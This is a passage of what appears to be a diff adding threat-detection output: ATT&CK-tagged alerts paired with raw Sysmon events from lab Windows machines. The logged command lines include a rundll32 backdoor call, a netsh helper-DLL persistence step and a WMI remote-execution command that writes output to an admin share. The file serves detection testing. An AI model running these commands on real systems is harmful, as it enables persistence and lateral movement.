+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
+    </TimeCreated>
+    <EventRecordID>578497</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4112"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
+    <Data Name=""ProcessId"">7280</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
+    <Data Name=""LogonId"">0x76073</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
+    <Data Name=""ParentProcessId"">2532</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
+    </TimeCreated>
+    <EventRecordID>243556</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
+    <Data Name=""ProcessId"">6136</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
+    </TimeCreated>
+    <EventRecordID>578497</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4112"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
+    <Data Name=""ProcessId"">7280</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
+    <Data Name=""LogonId"">0x76073</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
+    <Data Name=""ParentProcessId"">2532</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
+    </TimeCreated>
+    <EventRecordID>243556</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
+    <Data Name=""ProcessId"">6136</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-12-15T15:00:15.695416Z"">
+    </TimeCreated>
+    <EventRecordID>589974</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3524"" ThreadID=""4288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-12-15 15:00:14.467</Data>
+    <Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
+    <Data Name=""ProcessId"">6976</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10</Data>
+    <Data Name=""SourcePort"">50007</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.17</Data>
+    <Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
+    <Data Name=""DestinationPort"">135</Data>
+    <Data Name=""DestinationPortName"">epmap</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh.exe add helper AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.485479Z"">
+    </TimeCreated>
+    <EventRecordID>4947</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.336</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001051388B00</Data>
+    <Data Name=""ProcessId"">3824</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh.exe add helper AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
+    </TimeCreated>
+    <EventRecordID>243556</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
+    <Data Name=""ProcessId"">6136</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
+    </TimeCreated>
+    <EventRecordID>421225</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
+    <Data Name=""ProcessId"">4864</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
+    </TimeCreated>
+    <EventRecordID>421225</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
+    <Data Name=""ProcessId"">4864</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
+    </TimeCreated>
+    <EventRecordID>421225</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
+    <Data Name=""ProcessId"">4864</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
